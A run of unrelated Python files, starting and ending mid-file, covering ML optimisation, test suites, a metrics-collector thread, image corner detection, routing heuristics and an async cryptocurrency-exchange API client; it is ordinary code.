headers=client.get_headers(), params=params) request.raise_for_status() objects = request.json()["objects"] for item in objects: api_object = ApiObject.from_dict(item) self.update({getattr(api_object, api_type.value.key): api_object}) def __del__(self): raise RuntimeError("Deletion not allowed") def __delitem__(self, key): raise RuntimeError("Deletion not allowed") def sort_by_id(self): sorted = {} for object in self.data.values(): sorted.update({object.id: object}) return sorted class ApiObjectCache(Borg): def __init__(self, client: Union[Unset, Client] = UNSET) -> None: Borg.__init__(self) if not hasattr(self, "cache"): self.cache = dict[ApiObjectType, ApiObjects]() if not hasattr(self, "client") and not client: raise ValueError("Client not intialised.") if client: self.client = client def get(self, api_type: ApiObjectType) -> ApiObjects: if not api_type in self.cache: self.cache[api_type] = ApiObjects(self.client, api_type) return self.cache[api_type] from .base import FimacDatasetmauriziofilippone/constraining_dynamics_deep_models1-10 ## Copyright 2019 and ## ## Licensed under the Apache License, Version 2.0 (the "License"); ## you may not use this file except in compliance with the License. ## You may obtain a copy of the License at ## ## http://www.apache.org/licenses/LICENSE-2.0 ## ## Unless required by applicable law or agreed to in writing, software ## distributed under the License is distributed on an "AS IS" BASIS, ## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ## See the License for the specific language governing permissions and ## limitations under the License. import PyTorchDGP import numpy as np from numbers import Number import torch from torch.autograd import Variable import math import matplotlib.pyplot as plt import matplotlib.cm as cm import pandas as pd ## The optimization strategy we used follows a series of steps where parameters are optimized in groups. ## We found that initialization of the interpolant is important, so the first stage of the optimization is dedicated to that. 
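## (Editor's gloss, hedged, on the staging below:) a group is "frozen" simply by giving
## its parameter group a zero learning rate in torch.optim.Adam, e.g.
##     torch.optim.Adam([{'params': interpolant.parameters(), 'lr': 1e-2},
##                       {'params': ode_branch.parameters(),  'lr': 0}])
## where `interpolant` and `ode_branch` are illustrative names for model.branches[0]
## and model.branches[3] as used in Optimize_ODE below.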
## Next, we optimize sequentially (1) ODE parameters, (2) the interpolant, and (3) ODE parameters together with any parameters of the likelihood of the constraints def Optimize_ODE(x, y, model, dataset, optimization_stage, n_optimization_stages, D_OUT, Print=True): print("********** Optimization stage", optimization_stage + 1, "of", n_optimization_stages, ' -- ', end='') if optimization_stage == 0: print("Optimizing interpolant and noise on observations") Niterations = 10000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 1e-2}, \ {'params': model.branches[1].parameters(), 'lr': 1e-2},\ {'params': model.branches[2].parameters(), 'lr': 0},\ {'params': model.branches[3].parameters(), 'lr': 0 }]) elif (optimization_stage -1)%3 == 0: print("Optimizing ODE parameters") Niterations = 8000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 0}, \ {'params': model.branches[1].parameters(), 'lr': 0},\ {'params': model.branches[2].parameters(), 'lr': 0},\ {'params': model.branches[3].parameters(), 'lr': 1e-2}]) elif (optimization_stage - 2)%3 ==0: print("Optimizing Interpolant") Niterations = 4000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 1e-3}, \ {'params': model.branches[1].parameters(), 'lr': 0},\ {'params': model.branches[2].parameters(), 'lr': 0},\ {'params': model.branches[3].parameters(), 'lr': 0}]) elif (optimization_stage -3)%3==0: print("Optimizing ODE parameters and Student t parameters") Niterations = 4000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 0}, \ {'params': model.branches[1].parameters(), 'lr': 0},\ {'params': model.branches[2].parameters(), 'lr': 1e-3},\ {'params': model.branches[3].parameters(), 'lr': 1e-3}]) ## Optimization loop for iteration in range(Niterations+1): model.zero_grad() pred = model(x) ## Note again that in the first optimization stage we only optimize the interpolant if optimization_stage == 0: cost = -PyTorchDGP.Cost(y,pred) if optimization_stage > 0: cost = -PyTorchDGP.CostODE_StudentT(y, pred, pred, dataset) L = cost + model.KL() L.backward() optimizer.step() if Print: ## ********** Print if (iteration % 1000) == 0: print("\n** Iter = %8d" % iteration, "\t Round = %8d" %optimization_stage, "\tL = %8.3f" % L.data, end='') ## To be improved print("\n** Model hyper-parameters", end='') print("\nlog noise var =", end='') for i in range(D_OUT): print("\t%8.3f" % model.branches[1].sigma[i], end='') print("\nlog Student t scale =", end='') for i in range(D_OUT): print("\t%8.3f" % model.branches[2].scale[i], end='') for i in range(model.nlayers): print("\nlog lengthscale layer", i, "=", end='') print("\t%8.3f" % model.branches[0][i].l.data[0], end='') for i in range(model.nlayers): print("\nlog sigma layer", i, "=", end='') print("\t%8.3f" % model.branches[0][i].sigma.data[0,0], end='') print("\n** ODE parameters", end='') print("\nMeans =", end='') for i in range(len(model.branches[3].m_theta.data)): print("\t%8.3f" % np.exp(model.branches[3].m_theta.data[i]), end='') if not model.branches[3].factorized: print("\nDiagonal covariance =", end='') L = model.branches[3].L_chol_cov_theta.data.numpy() np.fill_diagonal(L, np.exp(model.branches[3].log_diag_L_chol_cov_theta.data.numpy())) print(np.diagonal(L)) else: print("\nVariances =", end='') for i in range(len(model.branches[3].s_theta.data)): print("\t%8.3f" % np.exp(model.branches[3].s_theta.data[i]), end='') print("\n") # -*- coding: utf-8 -*- """Prompt formatter for virtualenv and 
others""" import os import builtins import xonsh.platform as xp def env_name(pre_chars='(', post_chars=')'): """Extract the current environment name from $VIRTUAL_ENV or $CONDA_DEFAULT_ENV if that is set """ env_path = builtins.__xonsh_env__.get('VIRTUAL_ENV', '') if len(env_path) == 0 and xp.ON_ANACONDA: env_path = builtins.__xonsh_env__.get('CONDA_DEFAULT_ENV', '') env_name = os.path.basename(env_path) if env_name: return pre_chars + env_name + post_chars def vte_new_tab_cwd(): """This prints an escape sequence that tells VTE terminals the hostname and pwd. This should not be needed in most cases, but sometimes is for certain Linux terminals that do not read the PWD from the environment on startup. Note that this does not return a string, it simply prints and flushes the escape sequence to stdout directly. """ env = builtins.__xonsh_env__ t = '\033]7;file://{}{}\007' s = t.format(env.get('HOSTNAME'), env.get('PWD')) print(s, end='', flush=True) #!/bin/python3 import os import re import sys import json # Prefer read/writes happen in local module's dir... if __name__ == "__main__": mdir = sys.path[0] if os.path.isdir(sys.path[0]) else os.curdir else: mdir = os.path.dirname(__loader__.path) rpath = os.path.join(mdir, 'data/unimath/unicode-math-table.tex') if not os.path.exists(rpath): print('File not found: "%s"...\nQuitting...' % rpath, file=sys.stderr) sys.exit() with open(rpath) as f: unimath_raw = f.readlines() main_RE = re.compile(r'^\\\w+{"([\dA-F]+)}{(\\\w+)\s*}{\\\w+}{(.*)}%\n$') trip = (main_RE.match(m).groups() for m in unimath_raw) outdict = {name: {'name': name, 'mode': ('math',), 'symbol': eval('"\\u' + sym + '"'), 'meta': {'package': 'unicode-math', 'uniname': desc} } for sym, name, desc in trip} # Save file dest = os.path.join(mdir, 'lists/unimath.json') if __name__ == "__main__": with open(dest, 'w') as f: json.dump(outdict, f, indent=2) ################# # debugSLUG # ################# # sys.exit() ################# ndalchau/emukit import pytest import numpy as np from numpy.testing import assert_equal from numpy.testing import assert_almost_equal from emukit.core import CategoricalParameter, ContinuousParameter from emukit.core import DiscreteParameter, InformationSourceParameter from emukit.core import OneHotEncoding, OrdinalEncoding from emukit.core import ParameterSpace, Parameter from emukit.core.encodings import Encoding from emukit.core.optimization import LocalSearchAcquisitionOptimizer def test_local_search_acquisition_optimizer(simple_square_acquisition): space = ParameterSpace([CategoricalParameter('x', OrdinalEncoding(np.arange(0, 100)))]) optimizer = LocalSearchAcquisitionOptimizer(space, 1000, 3) opt_x, opt_val = optimizer.optimize(simple_square_acquisition) # ordinal encoding is as integers 1, 2, ... 
np.testing.assert_array_equal(opt_x, np.array([[1.]])) np.testing.assert_array_equal(opt_val, np.array([[0.]])) class UnknownParameter(Parameter): def __init__(self, name: str): self.name = name def sample_uniform(num_points): return np.random.randint(0, 1, (num_points, 1)) space.parameters.append(UnknownParameter('y')) with pytest.raises(TypeError): optimizer.optimize(simple_square_acquisition) space.parameters.pop() class UnknownEncoding(Encoding): def __init__(self): super().__init__([1], [[1]]) space.parameters.append(CategoricalParameter('y', UnknownEncoding())) with pytest.raises(TypeError): optimizer.optimize(simple_square_acquisition) space.parameters.pop() def test_local_search_acquisition_optimizer_with_context(simple_square_acquisition): space = ParameterSpace([CategoricalParameter('x', OrdinalEncoding(np.arange(0, 100))), InformationSourceParameter(10)]) optimizer = LocalSearchAcquisitionOptimizer(space, 1000, 3) source_encoding = 1 opt_x, opt_val = optimizer.optimize(simple_square_acquisition, {'source': source_encoding}) np.testing.assert_array_equal(opt_x, np.array([[1., source_encoding]])) np.testing.assert_array_equal(opt_val, np.array([[0. + source_encoding]])) def test_local_search_acquisition_optimizer_neighbours(): np.random.seed(0) space = ParameterSpace([ CategoricalParameter('a', OneHotEncoding([1, 2, 3])), CategoricalParameter('b', OrdinalEncoding([0.1, 1, 2])), CategoricalParameter('c', OrdinalEncoding([0.1, 1, 2])), DiscreteParameter('d', [0.1, 1.2, 2.3]), ContinuousParameter('e', 0, 100), DiscreteParameter('no_neighbours', [1]), DiscreteParameter('f', [0.1, 1.2, 2.3]), ]) x = np.array([1, 0, 0, 1.6, 2.9, 0.1, 50, 1.2, 1.]) optimizer = LocalSearchAcquisitionOptimizer(space, 1000, 3, num_continuous=1) neighbourhood = optimizer._neighbours_per_parameter(x, space.parameters) assert_equal(np.array([[0, 1, 0], [0, 0, 1]]), neighbourhood[0]) assert_equal(np.array([[1], [3]]), neighbourhood[1]) assert_equal(np.array([[2]]), neighbourhood[2]) assert_equal(np.array([[1.2]]), neighbourhood[3]) assert_almost_equal(np.array([[53.5281047]]), neighbourhood[4]) assert_equal(np.empty((0, 1)), neighbourhood[5]) assert_equal(np.array([[0.1], [2.3]]), neighbourhood[6]) neighbours = optimizer._neighbours(x, space.parameters) assert_almost_equal(np.array([ [0, 1, 0, 2., 3., 0.1, 50., 1., 1.2], [0, 0, 1, 2., 3., 0.1, 50., 1., 1.2], [1, 0, 0, 1., 3., 0.1, 50., 1., 1.2], [1, 0, 0, 3., 3., 0.1, 50., 1., 1.2], [1, 0, 0, 2., 2., 0.1, 50., 1., 1.2], [1, 0, 0, 2., 3., 1.2, 50., 1., 1.2], [1, 0, 0, 2., 3., 0.1, 50.80031442, 1., 1.2], [1, 0, 0, 2., 3., 0.1, 50., 1., 0.1], [1, 0, 0, 2., 3., 0.1, 50., 1., 2.3], ]), space.round(neighbours)) import os import numpy as np from pycocotools.coco import COCO import cv2 from tqdm import tqdm import argparse import json import torch from fcos_core.structures.bounding_box import BoxList from fcos_core.structures.boxlist_ops import boxlist_iou def convert_box_to_boxlist(boxes, image_width, image_height): boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes boxes = BoxList(boxes, (image_width, image_height), mode="xywh").convert( "xyxy" ) return boxes def main(args): annFile = args.annotation annFile_full = 'datasets/coco/annotations/instances_train2017_full.json' coco = COCO(annFile) coco_full = COCO(annFile_full) image_ids=sorted(coco.getImgIds()) catIds = list(range(2, 10)) tp = 0 fn = 0 fp = 0 sum_iou = 0 partial_box_num_total = 0 missing_box_num_total = 0 pseudo_box_num_total = 0 N = len(image_ids) for i in tqdm(range(N)): im_idx = 
image_ids[i] imginfo = coco.loadImgs(im_idx)[0] image_width = imginfo['width'] image_height = imginfo['height'] # load annotations partial_anns = coco.loadAnns(coco.getAnnIds(imgIds=(im_idx,))) full_anns = coco_full.loadAnns(coco_full.getAnnIds(imgIds=(im_idx,), catIds=catIds)) # obtain boxes pseudo_boxes = [obj["bbox"] for obj in partial_anns if "ispseudo" in obj.keys()] partial_boxes = [obj["bbox"] for obj in partial_anns if "ispseudo" not in obj.keys()] partial_boxes_id = set([obj["id"] for obj in partial_anns if "ispseudo" not in obj.keys()]) missing_boxes = [obj["bbox"] for obj in full_anns if obj["id"] not in partial_boxes_id] partial_box_num = len(partial_boxes) missing_box_num = len(missing_boxes) pseudo_box_num = len(pseudo_boxes) partial_box_num_total += partial_box_num missing_box_num_total += missing_box_num pseudo_box_num_total += pseudo_box_num pseudo_boxes = convert_box_to_boxlist(pseudo_boxes, image_width, image_height) partial_boxes = convert_box_to_boxlist(partial_boxes, image_width, image_height) missing_boxes = convert_box_to_boxlist(missing_boxes, image_width, image_height) if missing_box_num == 0: fp += pseudo_box_num elif pseudo_box_num == 0: fn += missing_box_num else: # compute iou overlaps = boxlist_iou(missing_boxes, pseudo_boxes).numpy() matched_cnt = 0 for i in range(missing_box_num): matched = np.argmax(overlaps[i]) if overlaps[i, matched] >= 0.5: tp += 1 sum_iou += overlaps[i, matched] overlaps[:, matched] = 0 matched_cnt += 1 else: fn += 1 fp += pseudo_box_num - matched_cnt print(tp, fp, sum_iou/tp) print('TP={}, FP={}, FN={}, IoU Acc={}'.format(tp, fp, fn, sum_iou/tp)) print('PQ = {}'.format(sum_iou / (tp + 0.5*fp + 0.5*fn))) print('partial_box_num_total: {}'.format(partial_box_num_total)) print('missing_box_num_total: {}'.format(missing_box_num_total)) print('pseudo_box_num_total: {}'.format(pseudo_box_num_total)) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--annotation", help="annotation json file path. e.g instances_train2017_pseudo.json", type=str, default="datasets/coco/annotations/instances_train2017_pseudo.json") args = parser.parse_args() main(args)jasonnam/buck #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Verifies that an archive contains only allowed entries. 
""" import unittest from zipfile import ZipFile import pkg_resources ALLOWED_ENTRIES = """ com/facebook/buck/core/util/log/appendablelogrecord/AppendableLogRecord.class com/facebook/buck/jvm/java/runner/FileClassPathRunner.class com/facebook/buck/jvm/java/version/utils/JavaVersionUtils.class com/facebook/buck/test/result/type/ResultType.class com/facebook/buck/test/selectors/Nullable.class com/facebook/buck/test/selectors/PatternTestSelector.class com/facebook/buck/test/selectors/SimpleTestSelector.class com/facebook/buck/test/selectors/TestDescription.class com/facebook/buck/test/selectors/TestSelector.class com/facebook/buck/test/selectors/TestSelectorList$1.class com/facebook/buck/test/selectors/TestSelectorList$Builder.class com/facebook/buck/test/selectors/TestSelectorList.class com/facebook/buck/test/selectors/TestSelectorParseException.class com/facebook/buck/testrunner/BaseRunner.class com/facebook/buck/testrunner/BuckBlockJUnit4ClassRunner$1.class com/facebook/buck/testrunner/BuckBlockJUnit4ClassRunner.class com/facebook/buck/testrunner/BuckXmlTestRunListener.class com/facebook/buck/testrunner/CheckDependency.class com/facebook/buck/testrunner/DelegateRunNotifier$1.class com/facebook/buck/testrunner/DelegateRunNotifier$2.class com/facebook/buck/testrunner/DelegateRunNotifier.class com/facebook/buck/testrunner/DelegateRunnerWithTimeout$1.class com/facebook/buck/testrunner/DelegateRunnerWithTimeout.class com/facebook/buck/testrunner/InstrumentationMain.class com/facebook/buck/testrunner/InstrumentationTestRunner$1.class com/facebook/buck/testrunner/InstrumentationTestRunner$Nullable.class com/facebook/buck/testrunner/InstrumentationTestRunner.class com/facebook/buck/testrunner/JUnitMain.class com/facebook/buck/testrunner/JUnitRunner$1.class com/facebook/buck/testrunner/JUnitRunner$2$1.class com/facebook/buck/testrunner/JUnitRunner$2.class com/facebook/buck/testrunner/JUnitRunner$RecordingFilter.class com/facebook/buck/testrunner/JUnitRunner$TestListener.class com/facebook/buck/testrunner/JUnitRunner.class com/facebook/buck/testrunner/JulLogFormatter$1.class com/facebook/buck/testrunner/JulLogFormatter.class com/facebook/buck/testrunner/SameThreadFailOnTimeout.class com/facebook/buck/testrunner/TestNGMain.class com/facebook/buck/testrunner/TestNGRunner$1.class com/facebook/buck/testrunner/TestNGRunner$FilteringAnnotationTransformer.class com/facebook/buck/testrunner/TestNGRunner$JUnitReportReporterWithMethodParameters.class com/facebook/buck/testrunner/TestNGRunner$TestListener.class com/facebook/buck/testrunner/TestNGRunner.class com/facebook/buck/testrunner/TestResult.class com/facebook/buck/testrunner/TestXmlEscaper.class com/facebook/buck/testrunner/TestXmlEscaper$1.class com/facebook/buck/testrunner/TestXmlEscaper$AttributeEscaper.class com/facebook/buck/testrunner/TestXmlEscaper$ContentEscaper.class com/facebook/buck/util/concurrent/MostExecutors$1.class com/facebook/buck/util/concurrent/MostExecutors$NamedThreadFactory.class com/facebook/buck/util/concurrent/MostExecutors.class com/facebook/buck/util/environment/Architecture.class com/facebook/buck/util/environment/Platform.class com/facebook/buck/util/environment/PlatformType.class """ class TestAppend(unittest.TestCase): def test_allowed_jar_entries(self): with pkg_resources.resource_stream(__name__, "testrunner-bin-fixed.jar") as r: with ZipFile(r) as zip_file: for entry in zip_file.namelist(): if not entry.endswith("/"): self.assertTrue( entry in ALLOWED_ENTRIES, "Found unexpected entry in testrunner jar: %s" % entry, ) 
__author__ = 'jpsh' 10-100 #!/usr/bin/env python ''' Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import logging import threading from Queue import Queue from threading import Timer from application_metric_map import ApplicationMetricMap from event_definition import HostMetricCollectEvent, ProcessMetricCollectEvent from metric_collector import MetricsCollector from emitter import Emitter from host_info import HostInfo from aggregator import Aggregator from aggregator import AggregatorWatchdog logger = logging.getLogger() class Controller(threading.Thread): def __init__(self, config, stop_handler): # Process initialization code threading.Thread.__init__(self) logger.debug('Initializing Controller thread.') self.lock = threading.Lock() self.config = config self.metrics_config = config.getMetricGroupConfig() self.events_cache = [] hostinfo = HostInfo(config) self.application_metric_map = ApplicationMetricMap(hostinfo.get_hostname(), hostinfo.get_ip_address()) self.event_queue = Queue(config.get_max_queue_size()) self.metric_collector = MetricsCollector(self.event_queue, self.application_metric_map, hostinfo) self.sleep_interval = config.get_collector_sleep_interval() self._stop_handler = stop_handler self.initialize_events_cache() self.emitter = Emitter(self.config, self.application_metric_map, stop_handler) self._t = None self.aggregator = None self.aggregator_watchdog = None def run(self): logger.info('Running Controller thread: %s' % threading.currentThread().getName()) self.start_emitter() if self.config.is_inmemory_aggregation_enabled(): self.start_aggregator_with_watchdog() # Wake every 5 seconds to push events to the queue while True: if (self.event_queue.full()): logger.warn('Event Queue full!! Suspending further collections.') else: self.enqueque_events() # restart aggregator if needed if self.config.is_inmemory_aggregation_enabled() and not self.aggregator_watchdog.is_ok(): logger.warning("Aggregator is not available. 
Restarting aggregator.") self.start_aggregator_with_watchdog() pass # Wait for the service stop event instead of sleeping blindly if 0 == self._stop_handler.wait(self.sleep_interval): logger.info('Shutting down Controller thread') break if not self._t is None: self._t.cancel() self._t.join(5) # The emitter thread should have stopped by now, just ensure it has shut # down properly self.emitter.join(5) if self.config.is_inmemory_aggregation_enabled(): self.aggregator.stop() self.aggregator_watchdog.stop() self.aggregator.join(5) self.aggregator_watchdog.join(5) pass # TODO: Optimize to not use Timer class and use the Queue instead def enqueque_events(self): # Queue events for up to a minute for event in self.events_cache: self._t = Timer(event.get_collect_interval(), self.metric_collector.process_event, args=(event,)) self._t.start() pass def initialize_events_cache(self): self.events_cache = [] try: host_metrics_groups = self.metrics_config['host_metric_groups'] process_metrics_groups = self.metrics_config['process_metric_groups'] except KeyError, ke: logger.warn('Error loading metric groups.') raise ke pass if host_metrics_groups: for name, properties in host_metrics_groups.iteritems(): event = HostMetricCollectEvent(properties, name) logger.info('Adding event to cache, {0} : {1}'.format(name, properties)) self.events_cache.append(event) pass pass # if process_metrics_groups: # for name, properties in process_metrics_groups.iteritems(): # event = ProcessMetricCollectEvent(properties, name) # logger.info('Adding event to cache, {0} : {1}'.format(name, properties)) # #self.events_cache.append(event) # pass # pass pass def start_emitter(self): self.emitter.start() # Start aggregator and watcher threads def start_aggregator_with_watchdog(self): if self.aggregator: self.aggregator.stop() if self.aggregator_watchdog: self.aggregator_watchdog.stop() self.aggregator = Aggregator(self.config, self._stop_handler) self.aggregator_watchdog = AggregatorWatchdog(self.config, self._stop_handler) self.aggregator.start() self.aggregator_watchdog.start() utils/__init__.py import os import hashlib import uuid def make_safe(n: str): return n.lower().replace(' ', '_') def make_md5(n: str): return hashlib.md5(n.encode()).hexdigest() def make_uuid(name: str = ''): return name + str(uuid.uuid4()).replace('-', '') def check_folder(): required_folders = ['replays', 'beatmaps'] if not os.path.isdir('data'): os.mkdir('data') for folder in required_folders: if not os.path.isdir(f'data/{folder}'): os.mkdir(f'data/{folder}') import cv2 import numpy as np """使用cornerHarris检测图像角点""" img = cv2.imread('corner.png') # 将图像转化为灰度图像 gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) gray = np.float32(gray) # 检测图像角点 # 第二个参数值越小,标记角点的记号越小 # 第三个参数限定了Sobel算子的中孔(aperture) # 该参数定义了角点检测的敏感度,取值必须在3到31之间的奇数 dst = cv2.cornerHarris(gray, 2, 23, 0.04) # 将角点的位置标记为红色 img[dst > 0.01 * dst.max()] = [0, 0, 255] while True: cv2.imshow('corners', img) if cv2.waitKey(1000//12) & 0xff == ord('q'): break cv2.destroyAllWindows() from .bokeh import scatterplot from .bokeh import overlay_regression_line from .display import bokeh_image_slider tests/test_api.py10-100 def test_get_actions(api): df_actions = api.get_actions(7584) assert len(df_actions) def test_get_home_away_team_id(api): home_id, away_id = api.get_home_away_team_id(7584) assert home_id == 782 assert away_id == 778 def test_get_team_name(api): name = api.get_team_name(782) assert name == 'Belgium' def test_get_player_name(api): name = api.get_player_name(3089) assert name == '' from copy import 
deepcopy import numpy as np from numpy.random import Generator from heuristic.classes import Solution from heuristic.functions import random_selection, remove_empty_routes @remove_empty_routes def _worst(costs: np.ndarray, current: Solution, rnd_state: Generator) -> Solution: """ Randomly removes the worst customers based on the passed-in costs array. The random distribution is skewed to favour worst-cost customers. Internal - should not be exposed outside this module. """ destroyed = deepcopy(current) # First we sort the costs to obtain the customers by increasing cost. We # then randomly select customers, favouring worst customers. customers = np.argsort(costs) customers = customers[-random_selection(rnd_state)] for customer in customers: destroyed.unassigned.append(customer) route = destroyed.find_route(customer) route.remove_customer(customer) return destroyed GEM7318/Snowmobiledocs/snippets/overview/overview.py """ Demonstrate core functionality of snowmobile.. ../docs/snippets/overview/overview.py """ # -- Connecting -- # Block 1 import snowmobile sn = snowmobile.connect() # Block 2 print(sn) #> snowmobile.Snowmobile(creds='') print(sn.cfg) #> snowmobile.Configuration('snowmobile.toml') print(type(sn.con)) #> type(sn) #> snowmobile.core.connection.Snowmobile type(sn.con) #> None type(sn.cfg) #> snowmobile.core.configuration.Configuration print(sn.cfg.location) # 'path/to/your/snowmobile.toml' type(sn.cfg.connection) #> snowmobile.core.cfg.connection.Connection type(sn.cfg.loading) #> snowmobile.core.cfg.loading.Loading type(sn.cfg.script) #> snowmobile.core.cfg.script.Script type(sn.cfg.sql) #> snowmobile.core.cfg.other.SQL type(sn.cfg.ext_sources) #> snowmobile.core.cfg.other.Location # -- complete example; should run 'as is' -- import aiohttp import asyncio import re from idex.client import BaseClient, Client from idex.exceptions import IdexException, IdexAPIException, IdexRequestException, IdexCurrencyNotFoundException from idex.decorators import require_address, require_private_key class AsyncClient(BaseClient): @classmethod async def create(cls, api_key, address=None, private_key=None): self = AsyncClient(api_key) if address: await self.set_wallet_address(address, private_key) return self def _init_session(self): loop = asyncio.get_event_loop() session = aiohttp.ClientSession( loop=loop, headers=self._get_headers() ) return session async def _request(self, method, path, signed, **kwargs): kwargs = self._get_request_kwargs(signed, **kwargs) uri = self._create_uri(path) async with getattr(self.session, method)(uri, **kwargs) as response: self._last_response = response return await self._handle_response(response) @staticmethod async def _handle_response(response): """Internal helper for handling API responses from the Quoine server. Raises the appropriate exceptions when necessary; otherwise, returns the response. 
""" if not str(response.status).startswith('2'): raise IdexAPIException(response, response.status, await response.text()) try: res = await response.json() if 'error' in res: raise IdexAPIException(response, response.status, await response.text()) return res except ValueError: txt = await response.text() raise IdexRequestException('Invalid Response: {}'.format(txt)) async def _get(self, path, signed=False, **kwargs): return await self._request('get', path, signed, **kwargs) async def _post(self, path, signed=False, **kwargs): return await self._request('post', path, signed, **kwargs) async def _put(self, path, signed=False, **kwargs): return await self._request('put', path, signed, **kwargs) async def _delete(self, path, signed=False, **kwargs): return await self._request('delete', path, signed, **kwargs) async def set_wallet_address(self, address, private_key=None): self._wallet_address = address.lower() nonce_res = await self.get_my_next_nonce() self._start_nonce = nonce_res['nonce'] if private_key: if re.match(r"^0x[0-9a-zA-Z]{64}$", private_key) is None: raise(IdexException("Private key in invalid format must satisfy 0x[0-9a-zA-Z]{64}")) self._private_key = private_key set_wallet_address.__doc__ = Client.set_wallet_address.__doc__ # Market Endpoints async def get_tickers(self): return await self._post('returnTicker') get_tickers.__doc__ = Client.get_tickers.__doc__ async def get_ticker(self, market): data = { 'market': market } return await self._post('returnTicker', False, json=data) get_ticker.__doc__ = Client.get_ticker.__doc__ async def get_24hr_volume(self): return await self._post('return24Volume') get_24hr_volume.__doc__ = Client.get_24hr_volume.__doc__ async def get_order_book(self, market, count=1): data = { 'market': market, 'count': count } return await self._post('returnOrderBook', False, json=data) get_order_book.__doc__ = Client.get_order_book.__doc__ async def get_open_orders(self, market, address, count=10, cursor=None): data = { 'market': market, 'address': address, 'count': count } if cursor: data['cursor'] = cursor return await self._post('returnOpenOrders', False, json=data) get_open_orders.__doc__ = Client.get_open_orders.__doc__ @require_address async def get_my_open_orders(self, market, count=10, cursor=None): return await self.get_open_orders(market, self._wallet_address, count, cursor) get_my_open_orders.__doc__ = Client.get_my_open_orders.__doc__ async def get_order_status(self, order_hash): data = { 'orderHash': order_hash } return await self._post('returnOrderStatus', False, json=data) get_order_status.__doc__ = Client.get_order_status.__doc__ async def get_trade_history(self, market=None, address=None, start=None, end=None, count=10, sort='desc', cursor=None): data = {} if market: data['market'] = market if address: data['address'] = address if start: data['start'] = start if end: data['end'] = end return await self._post('returnTradeHistory', False, json=data) get_trade_history.__doc__ = Client.get_trade_history.__doc__ @require_address async def get_my_trade_history(self, market=None, start=None, end=None, count=10, sort='desc', cursor=None): return await self.get_trade_history(market, self._wallet_address, start, end) get_my_trade_history.__doc__ = Client.get_my_trade_history.__doc__ async def get_currencies(self): return await self._post('returnCurrencies') get_currencies.__doc__ = Client.get_currencies.__doc__ async def get_currency(self, currency): if currency not in self._currency_addresses: self._currency_addresses = await self.get_currencies() res = 
None if currency[:2] == '0x': for token, c in self._currency_addresses.items(): if c['address'] == currency: res = c break # check if we found the currency if res is None: raise IdexCurrencyNotFoundException(currency) else: if currency not in self._currency_addresses: raise IdexCurrencyNotFoundException(currency) res = self._currency_addresses[currency] return res get_currency.__doc__ = Client.get_currency.__doc__ async def get_balances(self, address, complete=False): data = { 'address': address } path = 'returnBalances' if complete: path = 'returnCompleteBalances' return await self._post(path, False, json=data) get_balances.__doc__ = Client.get_balances.__doc__ @require_address async def get_my_balances(self, complete=False): return await self.get_balances(self._wallet_address, complete) get_my_balances.__doc__ = Client.get_my_balances.__doc__ async def get_transfers(self, address, start=None, end=None): data = { 'address': address } if start: data['start'] = start if end: data['end'] = end return await self._post('returnDepositsWithdrawals', False, json=data) get_transfers.__doc__ = Client.get_transfers.__doc__ @require_address async def get_my_transfers(self, start=None, end=None): return await self.get_transfers(self._wallet_address, start, end) get_my_transfers.__doc__ = Client.get_my_transfers.__doc__ async def get_order_trades(self, order_hash): data = { 'orderHash': order_hash } return await self._post('returnOrderTrades', False, json=data) get_order_trades.__doc__ = Client.get_order_trades.__doc__ async def get_next_nonce(self, address): data = { 'address': address } return await self._post('returnNextNonce', False, json=data) get_next_nonce.__doc__ = Client.get_next_nonce.__doc__ @require_address async def get_my_next_nonce(self): return await self.get_next_nonce(self._wallet_address) get_my_next_nonce.__doc__ = Client.get_my_next_nonce.__doc__ async def _get_contract_address(self): if not self._contract_address: res = await self.get_contract_address() self._contract_address = res['address'] return self._contract_address _get_contract_address.__doc__ = Client._get_contract_address.__doc__ async def get_contract_address(self): return await self._post('returnContractAddress') get_contract_address.__doc__ = Client.get_contract_address.__doc__ # Trade Endpoints async def parse_from_currency_quantity(self, currency, quantity): currency_details = await self.get_currency(currency) return self._parse_from_currency_quantity(currency_details, quantity) parse_from_currency_quantity.__doc__ = Client.parse_from_currency_quantity.__doc__ async def convert_to_currency_quantity(self, currency, quantity): currency_details = await self.get_currency(currency) return self._convert_to_currency_quantity(currency_details, quantity) convert_to_currency_quantity.__doc__ = Client.convert_to_currency_quantity.__doc__ @require_address async def create_order(self, token_buy, token_sell, price, quantity): # convert buy and sell amounts based on decimals price = self._num_to_decimal(price) quantity = self._num_to_decimal(quantity) sell_quantity = price * quantity amount_buy = await self.convert_to_currency_quantity(token_buy, quantity) amount_sell = await self.convert_to_currency_quantity(token_sell, sell_quantity) return await self.create_order_wei(token_buy, token_sell, amount_buy, amount_sell) create_order.__doc__ = Client.create_order.__doc__ @require_address @require_private_key async def create_order_wei(self, token_buy, token_sell, amount_buy, amount_sell): contract_address = await 
